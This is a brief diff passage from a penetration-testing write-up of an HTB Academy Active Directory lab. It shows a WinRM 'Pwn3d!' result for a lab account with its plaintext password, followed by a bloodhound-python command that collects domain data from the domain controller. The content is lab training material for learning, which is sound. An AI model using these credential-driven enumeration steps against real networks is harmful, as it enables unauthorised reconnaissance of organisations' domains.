krovs/oscp-writeups/docs/HTB Academy/ad2.md

 WINRM       172.16.7.50     5985   NONE             [+] None\ab920:weasal (Pwn3d!)
 ```

-Collect the domain data with bloodhound-python, transfer it to the attack machine via scp and upload it to bloodhound
+Collect the domain data with `bloodhound-python`, transfer it to the attack machine via `scp`, and upload it to BloodHound:

 ```shell
 $bloodhound-python -c All -u ab920 -p weasal -d inlanefreight.local -dc dc01.inlanefreight.local -ns 172.16.7.3 --zip